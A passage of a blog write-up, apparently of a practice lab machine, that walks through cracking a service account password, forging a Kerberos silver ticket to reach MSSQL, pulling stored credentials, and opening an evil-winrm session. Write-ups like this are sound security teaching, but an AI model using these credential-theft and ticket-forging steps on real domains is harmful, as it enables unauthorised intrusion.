style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">JtR</code> cracked the password:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/1f5a678c38e91e66c8ba8f4f6c207c2d/cb163/crack-password.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 28.48101265822785%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAGCAYAAADDl76dAAAACXBIWXMAAAsTAAALEwEAmpwYAAABLklEQVR42lVRWW7CMBTMWQBBSEKMszn74oSllIKQqt7/JtN55qPqx2js6GWWZ2+tLgjyF3b6jCgZ0E4PlN0N3fREM9zR2Ad81WHtl9iEFTZBifWuwGqb/+ONbxy8on/CXn7QU6Dob6jGL3TLCxWFBbo+I0zHNzKLICEfewRxh4gcqh77Q/sn2LYfMOWC8/UbE9N0TFW3nzimE3RqkWQzDvxRUSjJedYDkuKEOJmI0d1FfLV9p/SmbkZdWTdsyhNyc0JaLBQZHMd6dKxz66BoJPeAqbZB5diPGie6C2t443hHwjpZMTMNh1lLcZeaySRlrOUs3yaaLkw3O+HUiMmMzHD3auCsdcKeqS9OSKqKWBQ32HP5SqrQfS/uZIFUj/hAUj8kC4K45aPkrJyRDX4BrVPEINptjMQAAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="crack password" title="" src="/static/1f5a678c38e91e66c8ba8f4f6c207c2d/50637/crack-password.png" srcset="/static/1f5a678c38e91e66c8ba8f4f6c207c2d/dda05/crack-password.png 158w, /static/1f5a678c38e91e66c8ba8f4f6c207c2d/679a3/crack-password.png 315w, /static/1f5a678c38e91e66c8ba8f4f6c207c2d/50637/crack-password.png 630w, /static/1f5a678c38e91e66c8ba8f4f6c207c2d/cb163/crack-password.png 687w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As stated in the "Additional Security Measures" document, only administrators were able to access the SQL service, so I couldn't connect to the database with the creds for <code class="language-text">sqlsvc</code>, but since I had the credentials for the service account, I was able to request a TGS ticket for the <code class="language-text">administrator</code> which would then provide access to the MSSQL service (aka silver ticket attack).</p> <p>In order to run the attack, I needed the NTLM password hash for <code class="language-text">sqlsvc</code>, the domain SID, and the SPN of the account.</p> <p>Converted the password to an NTLM hash:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 469px; " > <a class="gatsby-resp-image-link" href="/static/77ba7558b020983223457c5864e8ba8f/ad3dc/convert-to-ntlm-hash.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.18987341772152%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAw0lEQVR42h2MW26DMAAEOUtDcEkUwDwMJBBhAphCHqUoVdTe/xxTq18j7e6s4+1zvNjgJgtu9kRkKyI4cawM0/yk7Ra68Zvx+sNZPxinF+P8wg9q3jzF1i9x/QKxLxG7AkcWBlmvyGrhoCbifMDonqEZeIxXjvWdUn9RtCvq9IHuV+bbrz3/xI863hPDNtTW6wmTBidONWnWkqQNUp4Jo5q87EnVxdLYvEXaYWi7KG5IrBjIBlUM7A4VGy/DFeqfG5HxB0KFZO4kW4YEAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="convert to NTLM hash" title="" src="/static/77ba7558b020983223457c5864e8ba8f/ad3dc/convert-to-ntlm-hash.png" srcset="/static/77ba7558b020983223457c5864e8ba8f/dda05/convert-to-ntlm-hash.png 158w, /static/77ba7558b020983223457c5864e8ba8f/679a3/convert-to-ntlm-hash.png 315w, /static/77ba7558b020983223457c5864e8ba8f/ad3dc/convert-to-ntlm-hash.png 469w" sizes="(max-width: 469px) 100vw, 469px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>As shown on the <a href="https://learn.microsoft.com/en-us/sql/relational-databases/native-client/features/service-principal-name-spn-support-in-client-connections?view=sql-server-ver15#specifying-the-spn" target="_blank"> Microsoft Docs</a>, the SPN syntax for the MSSQL service is the following:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 564px; " > <a class="gatsby-resp-image-link" href="/static/1ccbcfec54970bedb18f993426a1918b/16918/SPN-microsoft-docs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 14.556962025316455%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAfklEQVR42j2P6w4FEQyEvf+TEi1/CHGb07G7p/JlFDMp572HiCCEAFXFnBOsuab1CSkZopAYEQ21fQz06O15n3NGsreiAscAMsa4IccW65yD3vtDa2gvvXV8HrLWurr3Rq0V7juYrzKY0MzJs01AVVOl2i/+nhv46F4bpRT8AJ746BPOXnETAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="SPN microsoft docs" title="" src="/static/1ccbcfec54970bedb18f993426a1918b/16918/SPN-microsoft-docs.png" srcset="/static/1ccbcfec54970bedb18f993426a1918b/dda05/SPN-microsoft-docs.png 158w, /static/1ccbcfec54970bedb18f993426a1918b/679a3/SPN-microsoft-docs.png 315w, /static/1ccbcfec54970bedb18f993426a1918b/16918/SPN-microsoft-docs.png 564w" sizes="(max-width: 564px) 100vw, 564px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>So the SPN for the MSSQL service instance in this domain was <code class="language-text">MSSQLSvc/dc1.scrm.local:1433</code></p> <p>Using <code class="language-text">netexec</code>, I retrieved the domain SID with the <code class="language-text">--get-sid</code> option:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/3b86f69b80410ab7149d320dea308fa8/b142a/netexec-get-sid.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 18.354430379746837%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAECAYAAACOXx+WAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA7klEQVR42hWOSVbCQAAFOYsaERLSg/QYkpgBDPKCeYosvP89ynZR7+/q1yrTF572X2zMjDI9Xb/QDwvT+U7VzhynGyacyDaOQjbksuW5iGR5IPvfbeRx7XhIPL54Vjt7Zqs6YjNzaC6Et5kwLvh+RrgB29/QzYKur8T6g8JcWKsTOzOg4oS0p3TSsdMDRWIl4g95EVLNNQmv+FTnpm/M+EmZhLK/oxL+/Rdtj2xUhYsdlU+EgSqOxNDzKgNapMLaNQQhGEPkXB/w+zodHCjLmvXWU4oKIWukbslFiywtXlusckniksSxlxanDF4Z/gCTWIVra76aGgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec-get-sid" title="" src="/static/3b86f69b80410ab7149d320dea308fa8/50637/netexec-get-sid.png" srcset="/static/3b86f69b80410ab7149d320dea308fa8/dda05/netexec-get-sid.png 158w, /static/3b86f69b80410ab7149d320dea308fa8/679a3/netexec-get-sid.png 315w, /static/3b86f69b80410ab7149d320dea308fa8/50637/netexec-get-sid.png 630w, /static/3b86f69b80410ab7149d320dea308fa8/b142a/netexec-get-sid.png 692w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">impacket-ticketer</code> created a TGS ticket for the <code class="language-text">administrator</code> user:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/a4f34fd3d94765c81f82d71a1e232dd1/cb163/request-ticket.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 44.30379746835443%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAJCAYAAAAywQxIAAAACXBIWXMAAAsTAAALEwEAmpwYAAABZ0lEQVR42oWS2ZKCMBRE+ReVRQQRJIRVNkEHy2XU//+Unk6ssuZlxoeumwrh5N7uGGbQwEquMMUdZtBDlCeU7QW74Rst1R+eqLobvM0OXrDDivLDRlfTK95y/ArLdQVDFBPK/o6suSGnsvqKojmjPTwI5H53QVwcIYsviHTEJtkjzEaI7ICIdSMHuFGLIBl4ZoIhUy7kHiLpEbNGcQeZH1FUJw2IuB9sW/ibGi470Ouo0V0GrI6XY2YJzOwEc0vC0IBsIGDSIMmblULux7xsy0tyfkvLifA9Fo7EXP38hwzVmbcu0HRX9ByxH59ICFyHNaxlCmeVY+nnuhOlj8CYQJcHd/StZwhVfab5FWw3o1IseGhmxhzrpf9gb6Aau+1vGI9P1iu6PcOgwSpVBVbAuS1+6QPQchLUfCrD+ODoFyT0ToWgO1Mwmq5li49gI2Jq4bZhR69kpXoK9E8pYJI+35/y8w39AP4BDVUksRbHZI8AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="request ticket" title="" src="/static/a4f34fd3d94765c81f82d71a1e232dd1/50637/request-ticket.png" srcset="/static/a4f34fd3d94765c81f82d71a1e232dd1/dda05/request-ticket.png 158w, /static/a4f34fd3d94765c81f82d71a1e232dd1/679a3/request-ticket.png 315w, /static/a4f34fd3d94765c81f82d71a1e232dd1/50637/request-ticket.png 630w, /static/a4f34fd3d94765c81f82d71a1e232dd1/cb163/request-ticket.png 687w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I was able to use the ticket with <code class="language-text">impacket-mssqlclient</code> to access the database:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/c1f546e874225288ebc6dfd8bef568a1/93633/connect-to-db.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAABY0lEQVR42k2R2XaCMBRF+ZQucaSKigQIo4xJcUC0tj60/f+/OL1Jre3DXhlWOPfuizGxM9hBh1V8wyo8gactZHuDaN8hdzfU8opSvmEZCJhWiPEiwdCKMHoOMVvERKSx7ASjWQBjE0hE6QFBKJFuD8jLE7ZlrwPVWhBu1MLLOtisxsJrwJIDHC7BuIAfvcCjbxfr7B7o5vD8CjwSYH4JL6jBiKVD90EDh1VYb3I4boHpnGM2V52FsKirKe2HU18zGDO9GjySEKTVX75wPH3g1H+iJVVOlcvmgqzoqAv52CdkEROleKVi5SPoF8PnDWpxQbu/kfJea6siSj2veq2d5h0yOhfVGWHS0oj2qChwzQqYExXo/Qskrbw4Ep0O29AjpV3VZ2zpTlGLKzyaF49bBNS56symmVl2fA/7w2A0P58ex+lOo8L0HOk+zfb0s4RWVbN8Mh0MJx5M0hyM3B9dOmvugd+68Ozt21POSAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="connect to DB" title="" src="/static/c1f546e874225288ebc6dfd8bef568a1/50637/connect-to-db.png" srcset="/static/c1f546e874225288ebc6dfd8bef568a1/dda05/connect-to-db.png 158w, /static/c1f546e874225288ebc6dfd8bef568a1/679a3/connect-to-db.png 315w, /static/c1f546e874225288ebc6dfd8bef568a1/50637/connect-to-db.png 630w, /static/c1f546e874225288ebc6dfd8bef568a1/93633/connect-to-db.png 635w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>After listing the databases, the only interesting one was <code class="language-text">ScrambleHR</code> since <code class="language-text">master</code>, <code class="language-text">tempdb</code>, <code class="language-text">model</code>, and <code class="language-text">msdb</code> are default:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 593px; " > <a class="gatsby-resp-image-link" href="/static/244b2e347a8d9972f1ef91700530d265/d3601/list-dbs.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 34.177215189873415%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAHCAYAAAAIy204AAAACXBIWXMAAAsTAAALEwEAmpwYAAAA2klEQVR42pWR2Q6CMBBF+RVgiqAmCl1Y1Kggij74/39znbYP4Jbow8ntMjmdSYP98Y56M6DZ3lDWZ0jdQZU9lqsdqs0VZTMgVy3W6ghd9ZwtCnNCznW5PvG6h64HSE6RVQiU6bAuDhAzjYgKxEIiJIk40S4tkVCIEoWQ7yI+t2ufnlD4PaUlgoJfthAXJalxYjEzIEZwgYUme+IacjliO7M4oeExbJcxv+JlHnKYd9JXnuVu5PmycR1OheKb8KN0FAe5PCBb1JNxf5R+ETth1Vz4d1uW6v+lL+IH07fXTiQ9hm4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list DBs" title="" src="/static/244b2e347a8d9972f1ef91700530d265/d3601/list-dbs.png" srcset="/static/244b2e347a8d9972f1ef91700530d265/dda05/list-dbs.png 158w, /static/244b2e347a8d9972f1ef91700530d265/679a3/list-dbs.png 315w, /static/244b2e347a8d9972f1ef91700530d265/d3601/list-dbs.png 593w" sizes="(max-width: 593px) 100vw, 593px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Listed the tables from <code class="language-text">ScrambleHR</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/8173e009cc227ebb875ba3593758b702/cb163/list-tables.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 23.417721518987342%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAqUlEQVR42pWQyw6CMBBF+y28xKhAgT5AjfKsxg0b//9TrkOJIYosXJzctjNz2pTV7QBzf0KXBjyrEPELZQ1V3pDQPk6vSPIKXNTIdQ9JfRGdcdFAFAaZ6iC0QXF+IBUtWN0MUEWPIJTwgpwQcAnHz21aNjMO9bgbaXFsbcr3mkndYbsrrMyngRGPCgvCb9RP2Pi6Q3z6EK5KV+XzBSyjv9lHx4Vwkv4vfgGdbpsDpfnAUgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="list tables" title="" src="/static/8173e009cc227ebb875ba3593758b702/50637/list-tables.png" srcset="/static/8173e009cc227ebb875ba3593758b702/dda05/list-tables.png 158w, /static/8173e009cc227ebb875ba3593758b702/679a3/list-tables.png 315w, /static/8173e009cc227ebb875ba3593758b702/50637/list-tables.png 630w, /static/8173e009cc227ebb875ba3593758b702/cb163/list-tables.png 687w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>The <code class="language-text">UserImport</code> table contained credentials for <code class="language-text">MiscSvc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9188b05b19d9514fceadfe1162c342b6/ab60d/miscsvc-creds.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 13.29113924050633%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAtklEQVR42iWOWQ7CMBBDOQtLWVNaSNKQJkUt6gIVICHuf5XHAB8jjyzZzxMfbjg/cCoHbNGSZpFdGnDllUJ8bVu0+KboyHWD9T3GdZzi7fe78NUBH0fxRibaXsgOZ7r+TTyPHI412lx+pYUEmvZFVT/ZphHr+n9QYLF+oPIK7VpKycX6jq+kcLVxbJXnW2xkiQ9XgtDV/r80OzbkcsnaMUsM86VlutACCGxUYJpo5ivLbGlYq5IPAqZkBQGiIH4AAAAASUVORK5CYII='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="miscsvc creds" title="" src="/static/9188b05b19d9514fceadfe1162c342b6/50637/miscsvc-creds.png" srcset="/static/9188b05b19d9514fceadfe1162c342b6/dda05/miscsvc-creds.png 158w, /static/9188b05b19d9514fceadfe1162c342b6/679a3/miscsvc-creds.png 315w, /static/9188b05b19d9514fceadfe1162c342b6/50637/miscsvc-creds.png 630w, /static/9188b05b19d9514fceadfe1162c342b6/ab60d/miscsvc-creds.png 638w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Trying to make a connection using the credentials with <code class="language-text">evil-winrm</code> threw an error due to WinRM defaulting to NTLM authentication:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/bc653e9be22409a3c504e76d7da14dda/66d45/evil-winrm-error.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 25.949367088607595%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAAFCAYAAABFA8wzAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA30lEQVR42m2Oa2rDMBCEfZXa0cOWZDltbYnEcV2RYCglENr7X2U6slNooD8+dmd3dthC+RPU8wdUf4PwCeG4IF2+cF6+Mc5XvKdPjNMC0UTUNqJ1pI3ofIShrnTA7g+FdBOUP0N3Fyg3o6G2nrQjtDmgMQHWBoh6oM59hL2HZp0DxUOgmSDtTBKkS/zkDTtS1Seaj6jMjDLPuKvqA55Uj1IF1oBSb4G/rIGWhoxTw4olLdlz2eUZq1+J687Ta3RPz4bV290+37IvnHxBxpPu3uday1cIHjwyQBKh/2P78AcoR5tDtvFR8AAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm error" title="" src="/static/bc653e9be22409a3c504e76d7da14dda/50637/evil-winrm-error.png" srcset="/static/bc653e9be22409a3c504e76d7da14dda/dda05/evil-winrm-error.png 158w, /static/bc653e9be22409a3c504e76d7da14dda/679a3/evil-winrm-error.png 315w, /static/bc653e9be22409a3c504e76d7da14dda/50637/evil-winrm-error.png 630w, /static/bc653e9be22409a3c504e76d7da14dda/66d45/evil-winrm-error.png 683w" sizes="(max-width: 630px) 100vw, 630px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>To use Kerberos authentication, first I edited <code class="language-text">/etc/krb5.conf</code> to be the following:</p> <div class="gatsby-highlight" data-language="text"><pre class="language-text"><code class="language-text">[libdefaults] default_realm = SCRM.LOCAL [realms] SCRM.LOCAL = { kdc = dc1.scrm.local } [domain_realm] .scrm.local = SCRM.LOCAL scrm.local = SCRM.LOCAL</code></pre></div> <p>Next, I used <code class="language-text">impacket-getTGT</code> to create a ticket for <code class="language-text">MiscSvc</code>:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 580px; " > <a class="gatsby-resp-image-link" href="/static/f15f77e2b7b6f4605671f0199961cec8/065c3/getTGT-miscsvc.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 16.455696202531648%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAsklEQVR42l2L23KCMBRF+RYrSrTWGBKCGCyCgPcZndFO+///sQx57MOadWbvsyMhS2b5A1G8SOwdYXpcc6ftnxwvv5yuf/SnH7rjC1ddUaYhtS1m3QVPZmum8yI4FjmR0jWZOyOzFpXtUbZD5y355kBZ3bDFgaI8o/14sPEe+m19Cz/S75fpzrtBLBzR55dD6R2rtGKlBr5Zym3IpM8W/pZpTZxYPiYmMIo142nGOPmP5Q0Z02Nza2OLYQAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="getTGT miscsvc" title="" src="/static/f15f77e2b7b6f4605671f0199961cec8/065c3/getTGT-miscsvc.png" srcset="/static/f15f77e2b7b6f4605671f0199961cec8/dda05/getTGT-miscsvc.png 158w, /static/f15f77e2b7b6f4605671f0199961cec8/679a3/getTGT-miscsvc.png 315w, /static/f15f77e2b7b6f4605671f0199961cec8/065c3/getTGT-miscsvc.png 580w" sizes="(max-width: 580px) 100vw, 580px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p>Then, I set the <code class="language-text">KRB5CCNAME</code> to the ticket:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 353px; " > <a class="gatsby-resp-image-link" href="/static/5b9f11aa3f9144020595f50df994a8d2/3b7c6/set-KRB5CCNAME.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 15.18987341772152%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAADCAYAAACTWi8uAAAACXBIWXMAAAsTAAALEwEAmpwYAAAA0ElEQVR42hXOy06DUABF0X6JsYBAy+OWIngLlJdQTQvF+GoamxipOjHx/2fb62CNTrJzJld2jDWPsESL6W0wFzsMsUVzb9FnMX6Qk+VbZHKn3LPKdtTtE+m64/qmJc07inogUrtuRUzmYYGT7DGKEa354TI/E9YjdX9GqlD/cOJj/OVw/OLlMCqfdMOJbv/G8PjO6/GbZvNMWvZopgqadoTpVuiiQos7pn6FLxKkbFiGFbFsCcISoZ7+8xZrbGeF42WIZcnMTbnQAqZGiGHF/AGqhWZlIl6XCAAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="set KRB5CCNAME" title="" src="/static/5b9f11aa3f9144020595f50df994a8d2/3b7c6/set-KRB5CCNAME.png" srcset="/static/5b9f11aa3f9144020595f50df994a8d2/dda05/set-KRB5CCNAME.png 158w, /static/5b9f11aa3f9144020595f50df994a8d2/679a3/set-KRB5CCNAME.png 315w, /static/5b9f11aa3f9144020595f50df994a8d2/3b7c6/set-KRB5CCNAME.png 353w" sizes="(max-width: 353px) 100vw, 353px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">evil-winrm</code> was now able to establish a connection:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 500px; " > <a class="gatsby-resp-image-link" href="/static/a2c6da15a03a1e78806fc65788caec0d/c6e3d/evil-winrm-miscsvc.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 62.65822784810127%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACRElEQVR42mVT23aiQBD0VyI3BREEBoaL3MQYo3F33ezm7P9/SG31mOQck4c6XaDUdHX1zDx1hKOucIo3OPkfOFGLuj3h6fQP0+E3Hp/fsD/+xTBdzbvx8AovrOH5JexF8QUaMy87wt1M8NIDPHWCs6qR5ju0w4XCZ1QUj/hcdy/kZzSsSb5HnI2wvPy7oBN0cMPdDeRO0ML2O8xdjbmdYO6k5IKMPDPV8hRsijnfOiwws1c9rKDHPJxgrXbkA2wKW8st0cDyWRcVec3fuhuX6reYe5oi913O1LpHHm6hwxFF3CLPR8T5Gaq+IKtekLEm+kh+Rt6+QjUXRPoCtb1Cb89GZO6qT/uzTk/oix2GbEAZaaRRhjDusEl7xElH9FizbtSATdaz7rCKt1hvWr7vEaWDqUsGJaKzwknQcE4959WHCcayRFGfMO6vDOYH0/1lguh2P5n6Kwa+V+UTRTssGKAckOQTgmh7E/Q4ZJeCrk1w+N6SrXuFGfgdlje4vjaQjwVi985ysK6higkZT0nUCD9suDZ8LvZQ+tHwhF0Iz6sDO2tNyh8HOEv9JWV26K8qg2VQssMCy9VtcV1yTzpiXQSVOczjf2R1Hpz0vWZ3+zjL9R4WfxRhgfA57cccdtU8mw7zkp1xRrKHFu1JCLLwKZ3phheDh39aFkFHLLwj5IeScFUfjW0RkxsjtkVQFtpnoqrkOPRNULZgQYcmlDBqjM0PwTVnlPBaycrYfBb7K97vgHalOxEUYYfBSdfhpiPa97VR+A/HgZ7659TOlgAAAABJRU5ErkJggg=='); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="evil-winrm miscsvc" title="" src="/static/a2c6da15a03a1e78806fc65788caec0d/c6e3d/evil-winrm-miscsvc.png" srcset="/static/a2c6da15a03a1e78806fc65788caec0d/dda05/evil-winrm-miscsvc.png 158w, /static/a2c6da15a03a1e78806fc65788caec0d/679a3/evil-winrm-miscsvc.png 315w, /static/a2c6da15a03a1e78806fc65788caec0d/c6e3d/evil-winrm-miscsvc.png 500w" sizes="(max-width: 500px) 100vw, 500px" style="width:100%;height:100%;margin:0;vertical-align:middle;position:absolute;top:0;left:0;" loading="lazy" decoding="async" /> </a> </span></p> <p><code class="language-text">MiscSvc</code> had read access to the <code class="language-text">IT</code> share:</p> <p><span class="gatsby-resp-image-wrapper" style="position: relative; display: block; margin-left: auto; margin-right: auto; max-width: 630px; " > <a class="gatsby-resp-image-link" href="/static/9a5ced4d79ff5729b182c892bf8f9885/39600/netexec-list-shares-miscsvc.png" style="display: block" target="_blank" rel="noopener" > <span class="gatsby-resp-image-background-image" style="padding-bottom: 66.45569620253164%; position: relative; bottom: 0; left: 0; background-image: url('data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAABQAAAANCAYAAACpUE5eAAAACXBIWXMAAAsTAAALEwEAmpwYAAACeUlEQVR42k2T2XLaMBiFeZBeNCHg3dZmySvYEAoEhjbptBedvv9rnB6JNs2FBrH4+8/ys1jLLdb2hpV9RWYOaDdn7A5vmA+v6KYr9sfv0M0e67xFqSdUZoKod0iqAeuiRcbXKG/wmBgseRZZ/4ZYzcgItt0Rpv0CTagcTsjNjKq7oOqvkN0LBN+n5gjpngnld2bLz/yZUKgRKw/U8y/U/RmV3sL1J9jxBWp/g5gvKOwOWXtFNX2H2n5DUvZYijEo9SpVc4DkbzzQ0kWSOyzE+AOmO3HCNqgr9YyS90JsEGUtclqSHuDVlQOyyELZ5wD09jMOSKoxPJeUIxZJ+xMxL4XcoNtcUBNqOFnZPQEjle9g6cANZ+SMxcNt42EzNG0P7QwlHIc75thg0dKmqiyWnOyVeSVVUDkhznvkVCoJl1TlB4jCIEotHqMGSdrACgunbLD7GBNY1GdkbClOXYAI7YEMWd6BGYHCMKeaGRUDWmWgqztwRcCKqlYEL5P7WYzjCaOxmKyBZCb/1L0Dq79Asw8ZOmGQZXQUO54GDwR7Ze9AM7xCywZOWjTtHnVzhOZaSELSog9qa5ZmfXFU61SNzx4U35XFdLf8CNQDV0I0KEtmWB9YCnfRsRRa9EvrFXuYL0YQeBYCbaJRPRmMmcZXLfH0EWj7G6xyYfLzOKOnSkl7PsuECr1903DZqbzielwqgZuUMCuNKVN488Dov8pF0v3GOm2RsvaBeQ5cnZZqLCE58/P2h+0V43Tjru7w0ilYbfEp4t+ucOHuYUGlb7l2R9iq5jGYuhHWshAxhbzirKPtMaySzzRmyx1bVoznIXKhHMPGn1jQ/bT4A7DUpdeEOPqfAAAAAElFTkSuQmCC'); background-size: cover; display: block;" ></span> <img class="gatsby-resp-image-image" alt="netexec list shares miscsvc" title="" src="/static/9a5ced4d79ff5729b182c892bf8f9885/50637/netexec-list-shares-miscsvc.png" srcset="/static/9a5ced4d79ff5729b182c892bf8f9885/dda05/netexec-list-shares-miscsvc.png 158w, /static/9a5ced4d79ff5729b182c892bf8f9885/679a3/netexec-list-shares-miscsvc.png 315w, /static/9a5ced4d79ff5729b182c892bf8f9885/50637/netexec-list-shares-miscsvc.png 630w, 